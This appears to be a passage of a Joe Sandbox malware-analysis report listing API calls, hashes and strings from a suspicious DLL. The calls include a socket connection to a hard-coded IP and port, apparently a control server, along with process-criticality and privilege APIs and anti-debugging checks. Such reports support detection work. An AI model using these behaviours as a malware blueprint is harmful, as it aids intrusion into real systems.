                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$ModuleName$CopyExecuteShell
                                                                                                                                                                      • String ID: %s\%s$open

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 1000FF70: NdrClientCall2.RPCRT4 ref: 1000FF8F
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 1000F195
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 1000F1A2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeTask$Call2Client
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3085621743-0

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 1000165B
                                                                                                                                                                      • wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 1000167A
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100016AE
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FolderFreeKnownPathTaskwcstombs
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2577077003-0

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 374 1000ff40-1000ff6e NdrClientCall2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Call2Client
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1775071923-0

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 375 1000ff70-1000ffa1 NdrClientCall2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Call2Client
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1775071923-0

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 376 1000ffb0-1000ffe1 NdrClientCall2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Call2Client
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1775071923-0

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      control_flow_graph 377 1000fff0-10010021 NdrClientCall2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Call2Client
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1775071923-0
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 1000117B
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,RtlAdjustPrivilege), ref: 1000118D
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,RtlSetProcessIsCritical), ref: 100011A1
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 100011FD
                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 10001211
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,ndowClass,indow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10001236
                                                                                                                                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 10001251
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 1000125F
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 10001269
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$AddressProc$ClassCreateDispatchHandleLibraryLoadModuleRegisterTranslateWindow
                                                                                                                                                                      • String ID: RtlAdjustPrivilege$RtlSetProcessIsCritical$indow$ndowClass$ntdll.dll
                                                                                                                                                                      • API String ID: 3658383123-467612925
                                                                                                                                                                      • Opcode ID: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                      • Instruction ID: 32e2e5621d63ba41cde31a5517ede96aa96e783cbb1150e0d99a961b1b18e838
                                                                                                                                                                      • Opcode Fuzzy Hash: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                      • Instruction Fuzzy Hash: A331F4B4D40218AFEB14DFE5CC89BDDBBB4FF48701F108119F60AAA294D7749690CB10
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 02861A74
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,1001241C,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 02861A9A
                                                                                                                                                                      • SendMessageW.USER32(100176D4,00000409,00000000,00D77800), ref: 02861ACE
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,10001B80,?,00000000,00000000), ref: 02861B20
                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 02861B2B
                                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(00000002,?,?,?), ref: 02861B44
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateMessageWindow$HandleModuleNtdllPostProc_QuitSendThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4292518056-3916222277
                                                                                                                                                                      • Opcode ID: 92815e4858959fe170ce8b5a77519db06f86c61dccf7134616d8db3801c69204
                                                                                                                                                                      • Instruction ID: cc752dcd52aa9265c7c0a36d6adc18b2905358c888318f77e8925626a8a4a4c9
                                                                                                                                                                      • Opcode Fuzzy Hash: 92815e4858959fe170ce8b5a77519db06f86c61dccf7134616d8db3801c69204
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A3128B8640208FFEB10DF98CC89FAA7BB5EB48705F10C148FA09AB291D770D950CB65
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00000001), ref: 10011259
                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000003), ref: 1001127F
                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000050), ref: 10011309
                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 10011325
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001133E
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 10011348
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1045392073-0
                                                                                                                                                                      • Opcode ID: 16eea3db4395ea0ceff495b684aed5e6782a3178d032496c99d6345cf79e782e
                                                                                                                                                                      • Instruction ID: 9c1a1b5f42fc978b2ff8cf04cdab4bc874b060df06568115b329f45e6489fc23
                                                                                                                                                                      • Opcode Fuzzy Hash: 16eea3db4395ea0ceff495b684aed5e6782a3178d032496c99d6345cf79e782e
                                                                                                                                                                      • Instruction Fuzzy Hash: 3431E7B5D01228DADB11DFA4D9897CDBBB8FF08700F1041AAE40CAB250EB719B84CF45
                                                                                                                                                                      APIs
                                                                                                                                                                      • RpcStringBindingComposeW.RPCRT4(00000000,100124B8,100124E4,100124CC,00000000,02861D65), ref: 0286EE95
                                                                                                                                                                      • RpcBindingFromStringBindingW.RPCRT4(02861D65,00000000), ref: 0286EEB0
                                                                                                                                                                      • RpcBindingSetAuthInfoExA.RPCRT4(00000000,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 0286EEE7
                                                                                                                                                                      • RpcStringFreeW.RPCRT4(02861D65), ref: 0286EEF1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Binding$String$AuthComposeFreeFromInfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1126441048-0
                                                                                                                                                                      • Opcode ID: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                      • Instruction ID: ae46d6974ea60b10b24dce4f842b24a2ed8d0120ca92f721577ae9fb52ee315a
                                                                                                                                                                      • Opcode Fuzzy Hash: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                      • Instruction Fuzzy Hash: CD11DAB5D00219BFEB14CFE4C989BEEBBB4FB08704F108559E605B7280D7B59A54CBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 100113FB
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 1001140A
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 10011413
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 10011420
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                      • Opcode ID: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                      • Instruction ID: 0a3c688fa97bd66b33bde44f19f6c44622bf0dc03c57f15caf060906c92fb81b
                                                                                                                                                                      • Opcode Fuzzy Hash: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                      • Instruction Fuzzy Hash: 45F062B4D1021DEBDB05DBB4CA8999EBBF4FF1D200B918696E412E7111E730EB64DB50
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02871526
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0287152F
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0287153A
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 02871541
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                      • Opcode ID: 0d7c60a2ef05bffbce595573e6e262163d78959232fdd7494e8d52d076cdfd15
                                                                                                                                                                      • Instruction ID: 4980016af1f69655e72f99868af42ae204db573405a571edd3281e81c481927a
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d7c60a2ef05bffbce595573e6e262163d78959232fdd7494e8d52d076cdfd15
                                                                                                                                                                      • Instruction Fuzzy Hash: F6D012B1000114ABE7022FF0DD4CB593F29FB0C202F058200F30981022CB32D422CF51
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02871526
                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0287152F
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0287153A
                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 02871541
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                      • Opcode ID: b06f1e73e4fc9b3e9c8109c654ce749b3bdcd294ed5a62abbbf62953f21e2e11
                                                                                                                                                                      • Instruction ID: c91bca8abe4cc31a3593bf64d34d242ed6c9426ffac9acabdf0b694d2cdf9089
                                                                                                                                                                      • Opcode Fuzzy Hash: b06f1e73e4fc9b3e9c8109c654ce749b3bdcd294ed5a62abbbf62953f21e2e11
                                                                                                                                                                      • Instruction Fuzzy Hash: A4D0C9B1044114AFEB025BF0AD8CAAD3F25FB0C202F058304F34A81462C6728422CF11
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 02870EFD
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                      • Opcode ID: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                      • Instruction ID: d98202a22532f577ecb4645af019a0a68f0e8506740e40155c68da1d17d8fa4f
                                                                                                                                                                      • Opcode Fuzzy Hash: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                      • Instruction Fuzzy Hash: 9EA149B9A10715CBEB1ACF58C8C579ABBB1FB48324F24C52AE429EB6A0D334D540CF50
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 10010F26
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                      • Opcode ID: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                      • Instruction ID: 2823fa2859f74bead7cb2a3ff5e24ff6c926bc6ae68a0f7e2a3c8df160a01c34
                                                                                                                                                                      • Opcode Fuzzy Hash: e10a114a485f4d5e76f2123a624d2e1dd2d0fbf69899314706d994fee8950484
                                                                                                                                                                      • Instruction Fuzzy Hash: EBA1F7B1E11715CBEB1ACF54C8C169ABBF1FB48364F15C52AE819EB290D374DA808B90
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtdllDefWindowProc_W.NTDLL(00000011,?,?,?), ref: 02861135
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: NtdllProc_Window
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4255912815-0
                                                                                                                                                                      • Opcode ID: 107021637aa96cc5c1bd2a280f74957b00f7bc018f5350d6d5e6892ae08a1c1a
                                                                                                                                                                      • Instruction ID: 856db20c47a496988a0d8a66210a93f0feb4fdd4e401a7462383dea50b9fbc9a
                                                                                                                                                                      • Opcode Fuzzy Hash: 107021637aa96cc5c1bd2a280f74957b00f7bc018f5350d6d5e6892ae08a1c1a
                                                                                                                                                                      • Instruction Fuzzy Hash: B621EB78A44209AFEB14CF94CC8ABFD7775EB48701F109059FA1AAA2D1D7B09540CB51
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                                                                      • Instruction ID: 634bfd2156d84de619274b3c3120b2bc194c5d1f1ca33c58dade77456779207e
                                                                                                                                                                      • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                                                                      • Instruction Fuzzy Hash: 2131AA7AA0834B8FC310DF18C48092AB3E5FF89218F1A496DE985D7312E330F959CB95
                                                                                                                                                                      APIs
                                                                                                                                                                      • WSAStartup.WS2_32(00000202,?), ref: 100100E3
                                                                                                                                                                      • getaddrinfo.WS2_32(118.107.44.219,18852,?,00000000), ref: 1001012A
                                                                                                                                                                      • WSACleanup.WS2_32 ref: 10010139
                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10010141
                                                                                                                                                                      • socket.WS2_32(?,?,?), ref: 10010182
                                                                                                                                                                      • WSACleanup.WS2_32 ref: 10010196
                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001019E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Cleanupexit$Startupgetaddrinfosocket
                                                                                                                                                                      • String ID: 118.107.44.219$18852
                                                                                                                                                                      • API String ID: 2357443324-3001398927
                                                                                                                                                                      • Opcode ID: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                      • Instruction ID: 5d8dd8f7e503384157f0d0037aa173dfcecf3f6c77ed8d91bfff33004e817cc6
                                                                                                                                                                      • Opcode Fuzzy Hash: 629c58ebb369c9a4567a25f7efc7421930806d5ddf401b53f73b529e587ce57b
                                                                                                                                                                      • Instruction Fuzzy Hash: BC61F8B0A05225EFE704DFA8CD88B9D7BB5FB48311F108199F519AB2A0C774D980DB65
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE28
                                                                                                                                                                      • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE4D
                                                                                                                                                                      • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 1000CE76
                                                                                                                                                                      • ?flags@ios_base@std@@QBEHXZ.MSVCP140(6CC04730), ref: 1000CEE5
                                                                                                                                                                      • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000CF26
                                                                                                                                                                      • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDXZ.MSVCP140 ref: 1000CF3A
                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 1000CF4B
                                                                                                                                                                      • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000CF9C
                                                                                                                                                                      • ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(1000F2B3,?,?), ref: 1000CFB4
                                                                                                                                                                      • ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000D010
                                                                                                                                                                      • ?fill@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDXZ.MSVCP140 ref: 1000D024
                                                                                                                                                                      • ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP140(?), ref: 1000D035
                                                                                                                                                                      • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000), ref: 1000D088
                                                                                                                                                                      • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000), ref: 1000D0DA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
